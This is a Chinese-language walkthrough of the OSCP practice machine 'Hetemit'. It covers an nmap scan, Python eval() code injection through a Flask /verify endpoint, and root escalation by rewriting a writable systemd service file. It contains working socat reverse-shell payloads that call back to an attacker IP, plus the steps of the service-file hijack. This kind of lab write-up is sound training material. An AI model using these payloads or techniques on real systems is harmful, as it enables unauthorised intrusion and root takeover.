OSCP靶场–Hetemit
考点(python代码注入+ systemctrl提权)
1.nmap扫描
##
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.173.117 -sV -sC -Pn --min-rate 2500 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-10 05:52 EDT
Nmap scan report for 192.168.173.117
Host is up (0.24s latency).
Not shown: 65528 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.45.250
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 b1:e2:9d:f1:f8:10:db:a5:aa:5a:22:94:e8:92:61:65 (RSA)
| 256 74:dd:fa:f2:51:dd:74:38:2b:b2:ec:82:e5:91:82:28 (ECDSA)
|_ 256 48:bc:9d:eb:bd:4d:ac:b3:0b:5d:67:da:56:54:2b:a0 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos))
|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84 Apache HTTP \xE6\x9C\x8D\xE5\x8A\xA1\xE5\x99\xA8\xE6\xB5\x8B\xE8\xAF\x95\xE9\xA1\xB5
|_http-server-header: Apache/2.4.37 (centos)
| http-methods:
|_ Potentially risky methods: TRACE
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
18000/tcp open biimenu?
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| GetRequest, HTTPOptions:
| HTTP/1.0 403 Forbidden
| Content-Type: text/html; charset=UTF-8
| Content-Length: 3102
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8" />
| <title>Action Controller: Exception caught</title>
| <style>
| body {
| background-color: #FAFAFA;
| color: #333;
| margin: 0px;
| body, p, ol, ul, td {
| font-family: helvetica, verdana, arial, sans-serif;
| font-size: 13px;
| line-height: 18px;
| font-size: 11px;
| white-space: pre-wrap;
| pre.box {
| border: 1px solid #EEE;
| padding: 10px;
| margin: 0px;
| width: 958px;
| header {
| color: #F0F0F0;
| background: #C52F24;
| padding: 0.5em 1.5em;
| margin: 0.2em 0;
| line-height: 1.1em;
| font-size: 2em;
| color: #C52F24;
| line-height: 25px;
| .details {
|_ bord
50000/tcp open http Werkzeug httpd 1.0.1 (Python 3.6.8)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/1.0.1 Python/3.6.8
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at
Service Info: OS: Unix
Host script results:
| smb2-time:
| date: 2024-04-10T09:53:25
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 119.98 seconds
2.user priv
##
http://192.168.173.117:50000/verify
## post方法:code参数代码执行:
######
## 反弹shell:burp:
code={os.system('socat TCP:192.168.45.250:80 EXEC:/bin/sh')}
##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 80
listening on [any] 80 ...
192.168.173.117: inverse host lookup failed: Unknown host
connect to [192.168.45.250] from (UNKNOWN) [192.168.173.117] 52086
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("bash")'
[cmeeks@hetemit restjson_hetemit]$ ^Z
zsh: suspended nc -lvvp 80
┌──(root㉿kali)-[~/Desktop]
└─# stty raw -echo;fg
[1] + continued nc -lvvp 80
[cmeeks@hetemit restjson_hetemit]$ whoami
cmeeks
[cmeeks@hetemit restjson_hetemit]$
##################
## 查看原始代码:
[cmeeks@hetemit restjson_hetemit]$ ls
app.py __pycache__
[cmeeks@hetemit restjson_hetemit]$ cat app.py
from flask import Flask, request
import hashlib, os
app = Flask(__name__)
@app.route('/')
def f0():
return "{'/generate', '/verify'}"
@app.route('/generate', methods=['GET','POST'])
def f1():
if request.method == 'GET':
return "{'email@domain'}"
else:
email = request.form['email'].encode('utf-8')
return hashlib.sha256(email).hexdigest()
@app.route('/verify', methods=['GET','POST'])
def f2():
if request.method == 'GET':
return "{'code'}"
else:
code = request.form['code']
result = eval(code)
return str(result)
if __name__ == '__main__':
app.run()
[cmeeks@hetemit restjson_hetemit]$
3. root priv
##
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
Group cmeeks:
/etc/systemd/system/pythonapp.service
/var/tmp/dnf-cmeeks-ajfswzl1/dnf.librepo.log
/var/tmp/dnf-cmeeks-ajfswzl1/expired_repos.json
/var/tmp/dnf-cmeeks-ajfswzl1/hawkey.log
/tmp/linpeas.sh
#############
## 服务文件可写提权:
https://alvinsmith.gitbook.io/progressive-oscp/untitled/vulnversity-privilege-escalation
##
[cmeeks@hetemit restjson_hetemit]$ cat exploit.sh
cat exploit.sh
#!/bin/bash
socat TCP:192.168.45.250:18000 EXEC:sh
[cmeeks@hetemit restjson_hetemit]$ chmod +x exploit.sh
[cmeeks@hetemit restjson_hetemit]$ pwd
pwd
/home/cmeeks/restjson_hetemit
Before
[cmeeks@hetemit restjson_hetemit]$ cat /etc/systemd/system/pythonapp.service
cat /etc/systemd/system/pythonapp.service
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
WorkingDirectory=/home/cmeeks/restjson_hetemit
ExecStart=flask run -h 0.0.0.0 -p 50000
TimeoutSec=30
RestartSec=15s
User=cmeeks
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
After
[cmeeks@hetemit restjson_hetemit]$ cat /etc/systemd/system/pythonapp.service
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
ExecStart=/home/cmeeks/restjson_hetemit/exploit.sh
TimeoutSec=30
RestartSec=15s
User=root
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
[Install]
WantedBy=multi-user.target
[cmeeks@hetemit restjson_hetemit]$ sudo reboot
####################
## 等待重启后:反弹root shell
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 18000
listening on [any] 18000 ...
192.168.173.117: inverse host lookup failed: Unknown host
connect to [192.168.45.250] from (UNKNOWN) [192.168.173.117] 37110
id
uid=0(root) gid=0(root) groups=0(root)
python3 -c 'import pty;pty.spawn("bash")'
[root@hetemit /]# ^Z
zsh: suspended nc -lvvp 18000
┌──(root㉿kali)-[~/Desktop]
└─# stty raw -echo;fg
[1] + continued nc -lvvp 18000
[root@hetemit /]# whoami
root
4.总结:
##
##
https://al1z4deh.medium.com/proving-grounds-hetemit-8469d0a3f189
## 模板注入:python
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#python
